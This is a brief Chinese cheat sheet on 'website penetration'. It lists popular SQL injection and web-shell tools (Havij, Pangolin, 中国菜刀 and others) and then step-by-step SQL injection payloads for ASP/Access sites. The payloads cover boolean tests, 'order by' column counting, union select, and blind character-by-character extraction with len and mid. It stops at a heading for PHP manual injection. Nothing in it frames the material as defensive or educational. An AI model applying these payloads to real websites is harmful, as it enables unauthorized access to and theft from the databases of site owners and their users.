网站渗透常识
asp漏洞最多,php其次,jsp最少
asp一般搭配access数据库
php一般mysql数据库
工具
啊D注入工具
明小子
御剑
中国菜刀
穿山甲
Havij1.15
Nbsi
网站猎手
红黑注入工具
wwwscan
JSky
Pangolin
ASP语句构造注入
id=*** or 1=1
id=*** and exists (select count(*) from 表名) 需要先猜解到表名
id=*** and 1=2 union select 1,2,3,4.... from 表名 需要先猜解表情和对应的查询字段数量
and 1=1 返回正常
and 1=2 返回错误
and exists (select count(字段名)from 表名 )
order by 数字 判断表有多少列
and 1=2 union select 数字 from 表名
and (select top 1 len(字段名) from 表名)>0 查询长度
and (select top 1 asc(mid(字段名,N,1)) from 表名)>0 查询ASCII码
PHP手工注入
插入注入